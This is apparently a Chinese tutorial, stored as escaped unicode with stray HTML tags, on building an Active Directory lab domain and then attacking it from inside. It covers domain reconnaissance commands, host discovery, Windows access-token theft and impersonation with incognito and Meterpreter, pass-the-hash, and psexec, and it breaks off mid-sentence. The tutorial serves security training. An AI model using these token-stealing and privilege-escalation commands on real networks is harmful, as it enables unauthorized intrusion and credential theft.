\u901a\u5e38\u4e00\u4e2a\u5c0f\u516c\u53f8\uff0c\u4e00\u822c\u4e00\u4e2a\u57df\u5c31\u53ef\u4ee5\uff0c\u4e00\u4e2a\u57df\u5185\uff0c\u8981\u81f3\u5c11\u4e24\u53f0\u57df\u670d\u52a1\u5668\uff0c\u4e00\u53f0\u4f5c\u4e3a\u57df\u63a7\u5236\u5668\uff0c\u53e6\u4e00\u53f0\u5f53\u5907\u4efd\u3002<\/p>\n
\u6d3b\u52a8\u76ee\u5f55\u7684\u6570\u636e\u5e93\u3010\u5305\u62ec\u7528\u6237\u7684\u8d26\u53f7\u4fe1\u606f\u3011\u662f\u5b58\u50a8\u5728\u57df\u63a7\u5236\u5668\u4e2d\uff0c\u82e5\u6ca1\u5907\u4efd\uff0c\u762b\u75ea\u4e86\u4e0d\u80fd\u6b63\u5e38\u4f7f\u7528\u4e86\uff01<\/p>\n
\u7236\u548c\u5b50\u57df<\/strong><\/p>\n \u9700\u8981\u5728\u7f51\u7edc\u4e2d\u5212\u5206\u591a\u4e2a\u57df\u3002\u7b2c\u4e00\u4e2a\u57df\u79f0\u4e3a\u7236\u57df\uff0c\u5176\u4ed6\u4e3a\u5b50\u57df<\/p>\n \u57df\u6811<\/strong><\/p>\n \u57df\u68ee\u6797<\/strong><\/p>\n \u6307\u7684\u662f\u591a\u4e2a\u57df\u6811\u901a\u8fc7\u5efa\u7acb\u4fe1\u4efb\u5173\u7cfb\u7ec4\u6210\u7684\u96c6\u5408<\/p>\n \u6bd4\u5982\uff1a\u4e00\u4e2a\u516c\u53f8\u5e76\u8d2d\u5176\u4ed6\u516c\u53f8<\/p>\n \u662f\u6307\u7528\u4e8e\u5b9e\u73b0\u57df\u540d\u548c\u4e0e\u4e4b\u76f8\u5bf9\u5e94\u7684 IP \u5730\u5740\u8f6c\u6362\u7684\u670d\u52a1\u5668\u3002\u4ece\u5bf9\u57df\u6811\u7684\u4ecb\u7ecd\u4e2d\u6765\u770b\u51fa\uff0c\u57df\u6811\u4e2d\u7684\u57df\u540d\u548c DNS \u57df\u540d\u975e\u5e38\u76f8\u4f3c\u3002\u800c\u5b9e\u9645\u4e0a\uff0c\u56e0\u4e3a\u57df\u540d\u7684\u8ba1\u7b97\u673a\u662f\u4f7f\u7528DNS \u6765\u5b9a\u4f4d\u57df\u63a7\u5236\u5668\u3001\u670d\u52a1\u5668\u53ca\u5176\u4ed6\u8ba1\u7b97\u673a\u3001\u7f51\u7edc\u670d\u52a1\u7684\uff0c\u6240\u4ee5\u57df\u7684\u540d\u5b57\u5c31\u662fDNS \u57df\u7684\u540d\u5b57\u3002<\/p>\n \u5728\u5185\u7f51\u6e17\u900f\u6d4b\u8bd5\u4e2d\uff0c\u5927\u90fd\u662f\u901a\u8fc7\u5bfb\u627e DNS \u670d\u52a1\u5668\u6765\u786e\u5b9a\u57df\u63a7\u5236\u5668\u7684\u4f4d\u7f6e\u7684{DNS\u670d\u52a1\u5668\u548c\u57df\u63a7\u5236\u5668\u901a\u5e38\u914d\u7f6e\u5728\u540c\u4e00\u53f0\u673a\u5668\u4e0a}<\/p>\n DC:\u57df\u63a7\uff0c\u57df\u7684\u521b\u5efa\u8005<\/p>\n \u57df\u7ba1\u7406:\u57df\u63a7\u4e0a\u7684\u7ba1\u7406\u5458<\/p>\n AD \u6d3b\u5f97\u76ee\u5f55:Active Directory<\/p>\n NTDS.dit:\u57df\u7528\u6237\u5e10\u6237\u4ee5\u57df\u6570\u636e\u5e93\u7684\u5f62\u5f0f\u4fdd\u5b58\u5728\u6d3b\u52a8\u76ee\u5f55\u4e2d<\/p>\n Ntdsutil.exe-ntdsutil.exe \u662f\u57df\u63a7\u5236\u5668\u81ea\u5e26\u7684\u57df\u6570\u636e\u5e93\u7ba1\u7406\u5de5\u5177\uff0c\u4ece windowsServer 2008 \u5f00\u59cb\u5c31\u9ed8\u8ba4\u81ea\u5e26\u4e86\u3002\u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7 ntdsutil.exe \u63d0\u53d6\u51fa\u57df\u4e2d\u6240\u6709\u7684\u57df\u7528\u6237\u4fe1\u606f<\/p>\n \u5e38\u89c1\u7ed3\u6784:\u7ec4\u7ec7\u5355\u5143(OU)\u3001\u57df(DOMAIN)\u3001\u57df\u6811(tree)\u3001\u57df\u68ee\u6797(forest)\uff0c\u5728\u57df\u6811\u5185\u7684\u6240\u6709\u57df\u5171\u4eab\u4e00\u4e2a\u6d3b\u52a8\u76ee\u5f55\uff0c\u8fd9\u4e2a\u6d3b\u52a8\u76ee\u5f55\u5185\u7684\u6570\u636e\u5206\u6563\u5730\u5b58\u50a8\u5728\u5404\u4e2a\u57df\u5185\uff0c\u4e14\u6bcf\u4e00\u4e2a\u57df\u53ea\u5b58\u50a8\u8be5\u57df\u5185\u7684\u6570\u636e<\/p>\n \u6d3b\u52a8\u76ee\u5f55\uff1a<\/p>\n \u5e10\u53f7\u96c6\u4e2d\u7ba1\u7406\uff1a\u6240\u6709\u5e10\u53f7\u5747\u5b58\u5728\u670d\u52a1\u5668\u4e0a\uff0c\u65b9\u4fbf\u5bf9\u5e10\u53f7\u7684\u91cd\u547d\u540d\/\u91cd\u7f6e\u5bc6\u7801\u3002<\/p>\n<\/li>\n \u8f6f\u4ef6\u96c6\u4e2d\u7ba1\u7406\uff1a\u7edf\u4e00\u63a8\u9001\u8f6f\u4ef6\uff0c\u7edf\u4e00\u5b89\u88c5\u7f51\u7edc\u6253\u5370\u673a\u7b49\u3002\u5229\u7528\u8f6f\u4ef6\u53d1\u5e03\u7b56\u7565\u5206\u53d1\u8f6f\u4ef6,\u53ef\u4ee5\u8ba9\u7528\u6237\u81ea\u7531\u9009\u62e9\u5b89\u88c5\u8f6f\u4ef6\u3002<\/p>\n<\/li>\n \u73af\u5883\u96c6\u4e2d\u7ba1\u7406\uff1a\u5229\u7528 AD \u53ef\u4ee5\u7edf\u4e00\u5ba2\u6237\u7aef\u684c\u9762\uff0cIE\uff0cTCP\/IP \u7b49\u8bbe\u7f6e\u3002<\/p>\n<\/li>\n \u589e\u5f3a\u5b89\u5168\u6027\uff1a\u7edf\u4e00\u90e8\u7f72\u6740\u6bd2\u8f6f\u4ef6\u548c\u626b\u6bd2\u4efb\u52a1\uff0c\u96c6\u4e2d\u5316\u7ba1\u7406\u7528\u6237\u7684\u8ba1\u7b97\u673a\u6743\u9650\u3001\u7edf\u4e00\u5236\u8ba2\u7528\u6237\u5bc6\u7801\u7b56\u7565\u7b49\uff0c\u53ef\u76d1\u63a7\u7f51\u7edc\uff0c\u8d44\u6599\u7edf\u4e00\u7ba1\u7406\u3002<\/p>\n<\/li>\n \u66f4\u53ef\u9760\uff1a\u66f4\u5c11\u7684\u5b95\u673a\u65f6\u95f4\u3002\u5982\uff1a\u5229\u7528 AD \u63a7\u5236\u7528\u6237\u8bbf\u95ee\u6743\u9650\uff0c\u5229\u7528\u7fa4\u96c6\u3001\u8d1f\u8f7d\u5747\u8861\u7b49\u6280\u672f\u5bf9\u6587\u4ef6\u670d\u52a1\u5668\u8fdb\u884c\u5bb9\u707e\u8bbe\u5b9a\uff0c\u66f4\u53ef\u9760\uff0c\u5b95\u673a\u65f6\u95f4\u66f4\u5c11\u3002<\/p>\n<\/li>\n \u6d3b\u52a8\u76ee\u5f55\u4e3a Microsoft \u7edf\u4e00\u7ba1\u7406\u7684\u57fa\u7840\u5e73\u53f0\uff0c\u5176\u5b83 ISA\u3001Exchange\u3001SMS \u7b49\u670d\u52a1\u90fd\u4f9d\u8d56\u4e8e\u8fd9\u4e2a\u57fa\u7840\u5e73\u53f0\u3002<\/p>\n<\/li>\n<\/ul>\n \u9009\u62e9 Active Directory \u57df\u670d\u52a1 \u70b9\u51fb\u4e0b\u4e00\u6b65 \u70b9\u51fb\u5b89\u88c5<\/p>\n \u70b9\u51fb \u5c06\u6b64\u670d\u52a1\u5668\u63d0\u5347\u4e3a\u57df\u63a7\u5236\u5668<\/p>\n \u5b89\u88c5\u6210\u529f\u540e\u4f1a\u81ea\u52a8\u91cd\u542f\u670d\u52a1\u5668 \u8f93\u5165\u8bbe\u7f6e\u7684\u5bc6\u7801 \u5373\u53ef\u767b\u5f55<\/p>\n \u73b0\u5728\u5df2\u7ecf\u5728\u57df\u73af\u5883\u4e0b\u4e86<\/p>\n \u6253\u5f00 \u7ec4\u7b56\u7565\u7ba1\u7406\u8bbe\u7f6e\u5bc6\u7801\u7b56\u7565\u548c\u8bbe\u7f6e\u53e3\u4ee4\u8fc7\u671f\u65f6\u95f4<\/p>\n \u4e0d\u8bbe\u7f6e\u4e5f\u6ca1\u5173\u7cfb \u5bc6\u7801\u5efa\u7acb\u7684\u65f6\u5019\u590d\u6742\u4e00\u4e9b\uff0c\u8fd8\u6709\u5bc6\u7801\u6709\u8fc7\u671f\u65f6\u95f4\uff0c\u4f1a\u5f71\u54cd\u4ee5\u540e\u7684\u5b9e\u9a8c<\/p>\n \u66f4\u6539\u4e4b\u540e\u5c31\u9700\u8981\u66f4\u65b0\u4e00\u4e0b\u7b56\u7565\uff0c\u4f7f\u6b64\u7b56\u7565\u4fee\u6539\u751f\u6548\u3002\u65b9\u6cd5\u6709\u4e0b\u9762 3 \u4e2a\uff1a<\/p>\n 1\u3001\u7b49\u5f85\u7cfb\u7edf\u81ea\u52a8\u5237\u65b0\u7ec4\u7b56\u7565\uff0c\u7ea6 5 \u5206\u949f~15 \u5206\u949f.<\/p>\n 2\u3001\u91cd\u542f\u57df\u63a7\u5236\u5668\uff08\u82e5\u662f\u4fee\u6539\u7684\u7528\u6237\u7b56\u7565\uff0c\u6ce8\u9500\u5373\u53ef\uff09<\/p>\n 3\u3001\u4f7f\u7528 gpupdate \u547d\u4ee4<\/p>\n \u4ec5\u5237\u65b0\u8ba1\u7b97\u673a\u7b56\u7565\uff1agpupdate\/target:computer<\/p>\n \u4ec5\u5237\u65b0\u7528\u6237\u7b56\u7565\uff1agpupdate\/target:user<\/p>\n \u4e8c\u8005\u90fd\u5237\u65b0\uff1agpupdate \/force<\/p>\n \u5728 12server-dc \u65b0\u5efa\u666e\u901a\u7528\u6237 test \u5bc6\u7801 123456<\/p>\n \u8bbe\u7f6e\u6210\u529f\u540e 12server-01 \u66f4\u6539 dns \u7684 ip \u4e3a 12server-dc \u7684 ip 192.168.0.120<\/p>\n \u9009\u62e9\u6211\u7684\u7535\u8111 \u8bbe\u7f6e\u96b6\u5c5e\u57df moonsec.fbi \u786e\u5b9a\u91cd\u542f\u5373\u53ef<\/p>\n \u786e\u5b9a\u540e \u7cfb\u7edf\u63d0\u793a\u8f93\u5165\u8d26\u53f7\u548c\u5bc6\u7801\uff0c\u8f93\u5165\u521a\u624d\u7684 test 123456 \u5373\u53ef<\/p>\n \u52a0\u5165\u6210\u529f\u540e \u7cfb\u7edf\u63d0\u793a\u4f60\u91cd\u542f\u3002 \u91cd\u542f\u540e\u8f93\u5165 moonsectest \u5373\u53ef\u767b\u5f55\u57df moonsec \u7528\u6237\u662f test \u8f93\u5165\u5bc6\u7801 123456 \u5373\u53ef<\/p>\n \u81f3\u6b64\u57df\u73af\u5883\u5df2\u7ecf\u642d\u5efa\u6210\u529f<\/p>\n \u67e5\u8be2\u5f53\u524d\u73af\u5883<\/p>\n net user \/domain \u67e5\u8be2\u5f53\u524d\u57df\u7528\u6237<\/p>\n net time \u67e5\u8be2 \u57df\u63a7<\/p>\n net group \/domain \u67e5\u8be2\u57df\u5de5\u4f5c\u7ec4<\/p>\n net group "domain admins" \/domain \u67e5\u8be2\u57df\u7ba1\u7406\u7528\u6237<\/p>\n net group "Domain controllers"\u67e5\u8be2\u6709\u51e0\u53f0\u57df\u63a7\u5236\u5668 \u9700\u8981\u57df\u6743\u9650<\/p>\n net time \u67e5\u8be2\u65f6\u95f4 \u8fd9\u4e2a\u547d\u4ee4\u4f1a\u8bf7\u6c42\u57df\u670d\u52a1\u5668\u7684\u65f6\u95f4<\/p>\n net config workstation \u67e5\u770b\u5f53\u524d\u5de5\u4f5c\u73af\u5883<\/p>\n nltest \/dclist:moonsec \u67e5\u8be2\u57df\u63a7<\/p>\n ping 12server-dc.moonsec.fbi<\/p>\n nslookup 12server-dc.moonsec.fbi<\/p>\n \u5728\u57df\u5185\u8fdb\u884c\u6a2a\u884c\u6e17\u900f\u65f6\uff0c\u9996\u5148\u8981\u6536\u96c6\u4e3b\u673a\u7684\u7aef\u53e3\u548c ip \u4fe1\u606f<\/p>\n net view \/domain \u67e5\u8be2\u57df\u5185\u7684\u4e3b\u673a\u4fe1\u606f<\/p>\n \u53d1\u751f\u7cfb\u7edf\u9519\u8bef 6118 \u51fa\u73b0\u8fd9\u79cd\u9519\u8bef\u65f6 Computer Browser \u88ab\u7981\u7528\u4e86 \u5728\u57df\u7ba1\u7406\u542f\u7528\u5373\u53ef<\/p>\n net view \/domain:moonsec<\/p>\n arp -a \u67e5\u8be2\u901a\u4fe1<\/p>\n nbtscan \u53d1\u73b0\u4e3b\u673a<\/p>\n nbtscan.exe -r 192.168.0.0\/24<\/p>\n bat \u547d\u4ee4\u53d1\u73b0\u4e3b\u673a<\/p>\n for \/l %i in (1,1,255) do @ping 192.168.0.%i -w 1 -n 1|find \/i "ttl="<\/p>\n \u901a\u8fc7 powershell \u811a\u672c\u626b\u63cf IP \u5730\u5740\u5b58\u6d3b\uff1a<\/p>\n \u9488\u5bf9\u5355\u4e2a IP \u7684\u591a\u4e2a\u7aef\u53e3\u7684\u626b\u63cf\uff1a<\/p>\n \u9488\u5bf9\u67d0 IP \u6bb5\u4e2d\u5355\u4e2a\u7aef\u53e3\u7684\u626b\u63cf<\/p>\n \u9488\u5bf9\u67d0 IP \u6bb5 & \u591a\u4e2a\u7aef\u53e3\u7684\u626b\u63cf\u5668<\/p>\n \u4f7f\u7528 msf \u8fdb\u884c\u53cd\u5f39 shell \u8fdb\u884c\u5185\u7f51\u6e17\u900f\u65f6\uff0c\u901a\u8fc7 msf \u81ea\u5e26\u7684\u626b\u63cf\u6a21\u5757\u8fdb\u884c\u5feb\u901f\u626b\u63cf<\/p>\n \u4e3b\u673a\u5b58\u6d3b\u63a2\u6d4b\uff1a<\/p>\n \u7aef\u53e3\u626b\u63cf\uff1a<\/p>\n nmap<\/p>\n Nmap \u662f\u4e00\u4e2a\u7aef\u53e3\u626b\u63cf\u5668\uff0c\u53ef\u7528\u4e8e\u4e3b\u673a\u53d1\u73b0\u3001\u7aef\u53e3\u626b\u63cf\u3001\u7248\u672c\u68c0\u6d4b\u3001OS \u68c0\u6d4b\u7b49\u3002<\/p>\n \u4f7f\u7528\u573a\u666f\uff1a\u5efa\u7acb socks \u4ee3\u7406\uff0cproxychains+Nmap \u626b\u63cf\u5185\u7f51\u3002<\/p>\n \u652f\u6301\u591a\u79cd\u626b\u63cf\u6a21\u5f0f\uff1a<\/p>\n \u5feb\u901f\u626b\u63cf\u6240\u6709\u7aef\u53e3\uff1a<\/p>\n \u901a\u8fc7\u57df\u6210\u5458\u4e3b\u673a\uff0c\u5b9a\u4f4d\u51fa\u57df\u63a7\u5236\u5668 IP \u53ca\u57df\u7ba1\u7406\u5458\u8d26\u53f7\uff0c\u5229\u7528\u57df\u6210\u5458\u4e3b\u673a\u4f5c\u4e3a\u8df3\u677f\uff0c\u6269\u5927\u6e17\u900f\u8303\u56f4\uff0c\u5229\u7528\u57df\u7ba1\u7406\u5458\u53ef\u4ee5\u767b\u9646\u57df\u4e2d\u4efb\u4f55\u6210\u5458\u4e3b\u673a\u7684\u7279\u6027\uff0c\u5b9a\u4f4d\u51fa\u57df\u7ba1\u7406\u5458\u767b\u9646\u8fc7\u7684\u4e3b\u673a IP\uff0c\u8bbe\u6cd5\u4ece\u57df\u6210\u5458\u4e3b\u673a\u5185\u5b58\u4e2d dump \u51fa\u57df\u7ba1\u7406\u5458\u5bc6\u7801\uff0c\u8fdb\u800c\u62ff\u4e0b\u57df\u63a7\u5236\u5668\u3001\u6e17\u900f\u6574\u4e2a\u5185\u7f51<\/p>\n \u4ee4\u724c(token)\u662f\u7cfb\u7edf\u7684\u4e34\u65f6\u79d8\u94a5\uff0c\u76f8\u5f53\u4e8e\u8d26\u53f7\u548c\u5bc6\u7801<\/strong>\uff0c\u7528\u6765\u51b3\u5b9a\u662f\u5426\u5141\u8bb8\u8fd9\u6b21\u8bf7\u6c42\u548c\u5224\u65ad\u8fd9\u6b21\u8bf7\u6c42\u662f\u5c5e\u4e8e\u54ea\u4e00\u4e2a\u7528\u6237\u7684\u3002\u5b83\u5141\u8bb8\u4f60\u5728\u4e0d\u63d0\u4f9b\u5bc6\u7801\u6216\u5176\u4ed6\u51ed\u8bc1\u7684\u524d\u63d0\u4e0b\uff0c\u8bbf\u95ee\u7f51\u7edc\u548c\u7cfb\u7edf\u8d44\u6e90\uff0c\u8fd9\u4e9b\u4ee4\u724c\u5c06\u6301\u7eed\u5b58\u5728\u4e8e\u7cfb\u7edf\u4e2d\uff0c\u9664\u975e\u7cfb\u7edf\u91cd\u65b0\u542f\u52a8\u3002\u4ee4\u724c\u6700\u5927\u7684\u7279\u70b9\u5c31\u662f\u968f\u673a\u6027\uff0c\u4e0d\u53ef\u9884\u6d4b\uff0c\u9ed1\u5ba2\u6216\u8f6f\u4ef6\u65e0\u6cd5\u731c\u6d4b\u51fa\u4ee4\u724c<\/p>\n \u5047\u5192\u4ee4\u724c<\/strong>\u53ef\u4ee5\u5047\u5192\u4e00\u4e2a\u7f51\u7edc\u4e2d\u7684\u53e6\u4e00\u4e2a\u7528\u6237\u8fdb\u884c\u5404\u7c7b\u64cd\u4f5c\u3002\u6240\u4ee5\u5f53\u4e00\u4e2a\u653b\u51fb\u8005\u9700\u8981\u57df\u7ba1\u7406\u5458\u7684\u64cd\u4f5c\u6743\u9650\u65f6\u5019\uff0c\u9700\u8981\u901a\u8fc7\u5047\u5192\u57df\u7ba1\u7406\u5458\u7684\u4ee4\u724c\u8fdb\u884c\u653b\u51fb<\/p>\n \u4ee4\u724c\u6709\u5f88\u591a\u79cd\uff1a<\/p>\n \u2022 \u8bbf\u95ee\u4ee4\u724c(Access Token)\uff1a\u8868\u793a\u8bbf\u95ee\u63a7\u5236\u64cd\u4f5c\u4e3b\u4f53\u7684\u7cfb\u7edf\u5bf9\u8c61<\/p>\n \u2022 \u4f1a\u8bdd\u4ee4\u724c(Session Token)\uff1a\u662f\u4ea4\u4e92\u4f1a\u8bdd\u4e2d\u552f\u4e00\u7684\u8eab\u4efd\u6807\u8bc6\u7b26<\/p>\n \u2022 \u5bc6\u4fdd\u4ee4\u724c(Security Token)\uff1a\u53c8\u53eb\u505a\u8ba4\u8bc1\u4ee4\u724c\u6216\u786c\u4ef6\u4ee4\u724c\uff0c\u662f\u4e00\u79cd\u8ba1\u7b97\u673a\u8eab\u4efd\u6821\u9a8c\u7684\u7269\u7406\u8bbe\u5907\uff0c\u4f8b\u5982 U \u76fe<\/p>\n Windows \u7684 AccessToken \u6709\u4e24\u79cd\u7c7b\u578b\uff1a<\/p>\n \u2022 Delegation Token\uff1a\u6388\u6743\u4ee4\u724c\uff0c\u5b83\u652f\u6301\u4ea4\u4e92\u5f0f\u4f1a\u8bdd\u767b\u5f55 (\u4f8b\u5982\u672c\u5730\u7528\u6237\u76f4\u63a5\u767b\u5f55\u3001\u8fdc\u7a0b\u684c\u9762\u767b\u5f55\u8bbf\u95ee)<\/p>\n \u2022 Impresonation Token\uff1a\u6a21\u62df\u4ee4\u724c\uff0c\u5b83\u662f\u975e\u4ea4\u4e92\u7684\u4f1a\u8bdd (\u4f8b\u5982\u4f7f\u7528 net use\u8bbf\u95ee\u5171\u4eab\u6587\u4ef6\u5939)\u3002<\/p>\n \u6ce8\uff1a \u4e24\u79cd token \u53ea\u5728\u7cfb\u7edf\u91cd\u542f\u540e\u6e05\u9664 \u5177\u6709 Delegation token \u7684\u7528\u6237\u5728\u6ce8\u9500\u540e\uff0c\u8be5 Token \u5c06\u53d8\u6210 Impersonation token\uff0c\u4f9d\u65e7\u6709\u6548\u3002<\/p>\n AccessToken \u7684\u7a83\u53d6\u4e0e\u5229\u7528\u9700\u8981 administrator \u7ba1\u7406\u5458\u6743\u9650\u3002\u4e5f\u5c31\u662f\u8bf4\u8981\u63d0\u6743\u3002<\/p>\n \u7a83\u53d6 AccessToken \u7684\u65b9\u6cd5\uff1a<\/p>\n incognito.exe \u7a0b\u5e8f \u3001InvokeTokenManipulat.ps1 \u811a\u672c \u3001MSF \u91cc\u7684 incognito \u6a21\u5757<\/p>\n \u7a0b\u5e8f\u5730\u5740\uff1ahttps:\/\/labs.mwrinfosecurity.com\/assets\/BlogFiles\/incognito2.zip<\/a><\/p>\n AccessToken \u7684\u5217\u4e3e(\u9700\u8981 administrator \u6743\u9650)<\/p>\n incognito.exe list_tokens -u<\/p>\n \u64cd\u4f5c\uff1a\u6a21\u62df\u5176\u4ed6\u7528\u6237\u7684\u4ee4\u724c\uff08\u590d\u5236 token\uff09**<\/p>\n \u5982\u679c\u8981\u4f7f\u7528 AccessToken \u6a21\u62df\u5176\u4ed6\u7528\u6237\uff0c\u53ef\u4ee5\u4f7f\u7528\u547d\u4ee4<\/p>\n incognito.exe execute -c "\u5b8c\u6574\u7684 Token \u540d" cmd.exe<\/p>\n \u4f8b\u5982\uff1a\u6a21\u62df system \u6743\u9650\u7528\u6237\uff08\u63d0\u6743\u81f3 system\uff09\uff1a<\/p>\n incognito.exe execute -c "NT AUTHORITYSYSTEM" cmd.exe<\/p>\n \u964d\u6743\u81f3\u5f53\u524d\u7528\u6237\uff1a<\/p>\n incognito.exe execute -c "\u5f53\u524d\u7528\u6237 token" cmd.exe<\/p>\n \u83b7\u53d6\u57df\u666e\u901a\u7528\u6237<\/p>\n incognito.exe execute -c "moonsectest" cmd.exe<\/p>\n use incognito #\u52a0\u8f7d incognito<\/p>\n list_tokens -u #\u5217\u51fa AccessToken<\/p>\n getuid #\u67e5\u770b\u5f53\u524d token<\/p>\n impersonate_token "NT AUTHORITYSYSTEM" #\u6a21\u62df system \u7528\u6237\uff0cgetsystem \u547d\u4ee4<\/p>\n \u5373\u5b9e\u73b0\u4e86\u8be5\u547d\u4ee4\u3002\u5982\u679c\u8981\u6a21\u62df\u5176\u4ed6\u7528\u6237\uff0c\u5c06 token \u540d\u6539\u4e3a\u5176\u4ed6\u7528\u6237\u5373\u53ef<\/p>\n steal_token 1252 #\u4ece\u8fdb\u7a0b\u7a83\u53d6 token<\/p>\n getsystem #\u63d0\u5347\u81f3 system \u6743\u9650<\/p>\n rev2self #\u8fd4\u56de\u5230\u4e4b\u524d\u7684 AccessToken \u6743\u9650<\/p>\n msf \u751f\u6210\u540e\u95e8<\/p>\n \u76d1\u542c\u7aef\u53e3<\/p>\n \u5217\u51fa\u4e24\u79cd\u4ee4\u724c<\/p>\n \u2022 Delegation Token\uff1a\u4e5f\u5c31\u662f\u6388\u6743\u4ee4\u724c\uff0c\u5b83\u652f\u6301\u4ea4\u4e92\u5f0f\u767b\u5f55(\u4f8b\u5982\u53ef\u4ee5\u901a\u8fc7\u8fdc\u7a0b<\/p>\n \u684c\u9762\u767b\u5f55\u8bbf\u95ee)<\/p>\n \u2022 Impresonation Token\uff1a\u6a21\u62df\u4ee4\u724c\uff0c\u5b83\u662f\u975e\u4ea4\u4e92\u7684\u4f1a\u8bdd\u3002<\/p>\n \u4f2a\u9020\u4ee4\u724c<\/p>\n \u9664\u4e86\u53ef\u4ee5\u4f2a\u9020\u4ee4\u724c \u4e5f\u53ef\u4ee5\u4ece\u8fdb\u7a0b\u91cc\u7a83\u53d6\u4ee4\u724c \u9996\u5148\u4f7f\u7528 ps \u547d\u4ee4\u5217\u51fa\u8fdb\u7a0b \u67e5\u770b\u8fdb\u7a0b<\/p>\n \u7528\u6237\u4f7f\u7528 steal_token pid \u7a83\u53d6\u4ee4\u724c\u5c31\u6709\u5bf9\u5e94\u7684\u6743\u9650<\/p>\n \u4ece\u8fdb\u7a0b\u7a83\u53d6\u4ee4\u724c<\/p>\n steal_token PID<\/p>\n \u8fd4\u56de\u4e4b\u524d\u7684 token<\/p>\n rev2self<\/p>\n pass the hash \u539f\u7406\uff1a<\/p>\n \u2022 \u5728 Windows \u7cfb\u7edf\u4e2d\uff0c\u901a\u5e38\u4f1a\u4f7f\u7528 NTLM \u8eab\u4efd\u8ba4\u8bc1<\/p>\n \u2022 NTLM \u8ba4\u8bc1\u4e0d\u4f7f\u7528\u660e\u6587\u53e3\u4ee4\uff0c\u800c\u662f\u4f7f\u7528\u53e3\u4ee4\u52a0\u5bc6\u540e\u7684 hash \u503c\uff0chash \u503c\u7531\u7cfb\u7edf API \u751f\u6210(\u4f8b\u5982 LsaLogonUser)<\/p>\n \u2022 hash \u5206\u4e3a LM hash \u548c NT hash\uff0c\u5982\u679c\u5bc6\u7801\u957f\u5ea6\u5927\u4e8e 15\uff0c\u90a3\u4e48\u65e0\u6cd5\u751f\u6210 LMhash\u3002\u4ece Windows Vista \u548c Windows Server 2008 \u5f00\u59cb\uff0c\u5fae\u8f6f\u9ed8\u8ba4\u7981\u7528 LMhash<\/p>\n \u2022 \u5982\u679c\u653b\u51fb\u8005\u83b7\u5f97\u4e86 hash\uff0c\u5c31\u80fd\u591f\u5728\u8eab\u4efd\u9a8c\u8bc1\u7684\u65f6\u5019\u6a21\u62df\u8be5\u7528\u6237(\u5373\u8df3\u8fc7\u8c03\u7528API \u751f\u6210 hash \u7684\u8fc7\u7a0b)<\/p>\n \u8fd9\u7c7b\u653b\u51fb\u9002\u7528\u4e8e\uff1a<\/p>\n \u2022 \u57df\/\u5de5\u4f5c\u7ec4\u73af\u5883<\/p>\n \u2022 \u53ef\u4ee5\u83b7\u5f97 hash\uff0c\u4f46\u662f\u6761\u4ef6\u4e0d\u5141\u8bb8\u5bf9 hash \u7206\u7834<\/p>\n \u2022 \u5185\u7f51\u4e2d\u5b58\u5728\u548c\u5f53\u524d\u673a\u5668\u76f8\u540c\u7684\u5bc6\u7801<\/p>\n \u5fae\u8f6f\u4e5f\u5bf9 pth \u6253\u8fc7\u8865\u4e01\uff0c\u7136\u800c\u5728\u6d4b\u8bd5\u4e2d\u53d1\u73b0\uff0c\u5728\u6253\u4e86\u8865\u4e01\u540e\uff0c\u5e38\u89c4\u7684 Pass The Hash \u5df2\u7ecf\u65e0\u6cd5\u6210\u529f\uff0c\u552f\u72ec\u9ed8\u8ba4\u7684 Administrator(SID 500)\u8d26\u53f7\u4f8b\u5916\uff0c\u5229\u7528\u8fd9\u4e2a\u8d26\u53f7\u4ecd\u53ef\u4ee5\u8fdb\u884c Pass The Hash \u8fdc\u7a0b ipc \u8fde\u63a5\u3002<\/p>\n \u5982\u679c\u7981\u7528\u4e86 ntlm \u8ba4\u8bc1\uff0cPsExec \u65e0\u6cd5\u5229\u7528\u83b7\u5f97\u7684 ntlm hash \u8fdb\u884c\u8fdc\u7a0b\u8fde\u63a5\uff0c\u4f46\u662f\u4f7f\u7528 mimikatz \u8fd8\u662f\u53ef\u4ee5\u653b\u51fb\u6210\u529f\u3002<\/p>\n \u4ece windows \u5230 windows \u6a2a\u5411 pth \u8fd9\u4e00\u7c7b\u653b\u51fb\u65b9\u6cd5\u6bd4\u8f83\u5e7f\u6cdb<\/p>\n \u5f97\u5230 hash \u540e\u8fdb\u884c<\/p>\n \u6210\u529f\u540e \u4f1a\u5f39\u51fa\u7ec8\u7aef cmd<\/p>\n psexec \u662f windows \u5b98\u65b9\u81ea\u5e26\u7684\uff0c\u4e0d\u4f1a\u5b58\u5728\u67e5\u6740\u95ee\u9898\uff0c\u5c5e\u4e8e pstools \u5229\u7528 PsExec \u53ef\u4ee5\u5728\u8fdc\u7a0b\u8ba1\u7b97\u673a\u4e0a\u6267\u884c\u547d\u4ee4\uff0c\u5176\u57fa\u672c\u539f\u7406\u662f\u901a\u8fc7\u7ba1\u9053\u5728\u8fdc\u7a0b\u76ee\u6807\u4e3b\u673a\u4e0a\u521b\u5efa\u4e00\u4e2apsexec \u670d\u52a1\uff0c\u5e76\u5728\u672c\u5730\u78c1\u76d8\u4e2d\u751f\u6210\u4e00\u4e2a\u540d\u4e3a PSEXESVC \u7684\u4e8c\u8fdb\u5236\u6587\u4ef6\uff0c\u7136\u540e\u901a\u8fc7psexec \u670d\u52a1\u8fd0\u884c\u547d\u4ee4\uff0c\u8fd0\u884c\u7ed3\u675f\u540e\u5220\u9664\u670d\u52a1<\/p>\n \u5229\u7528 SMB \u670d\u52a1\u53ef\u4ee5\u901a\u8fc7\u660e\u6587\u6216 hash \u4f20\u9012\u6765\u8fdc\u7a0b\u6267\u884c\uff0c\u6761\u4ef6 445 \u670d\u52a1\u7aef\u53e3\u5f00\u653e\u3002\u5bf9\u65b9\u5f00\u653e 445 \u7aef\u53e3\uff0c\u5c31\u76f8\u5f53\u4e8e\u5f00\u653e\u4e86 smb \u534f\u8bae<\/p>\n psexec \u7b2c\u4e00\u79cd\uff1a\u5148\u6709 ipc \u94fe\u63a5\uff0cpsexec \u9700\u8981\u660e\u6587\u6216 hash \u4f20\u9012<\/p>\n -accepteula \u7b2c\u4e00\u6b21\u8fd0\u884c PsExec \u4f1a\u5f39\u51fa\u786e\u8ba4\u6846\uff0c\u4f7f\u7528\u8be5\u53c2\u6570\u5c31\u4e0d\u4f1a\u5f39\u51fa\u786e\u8ba4\u6846<\/p>\n -s \u4ee5 System \u6743\u9650\u8fd0\u884c\u8fdc\u7a0b\u8fdb\u7a0b\uff0c\u5982\u679c\u4e0d\u7528\u8fd9\u4e2a\u53c2\u6570\uff0c\u5c31\u4f1a\u83b7\u5f97\u4e00\u4e2a\u5bf9\u5e94\u7528\u6237\u6743\u9650\u7684 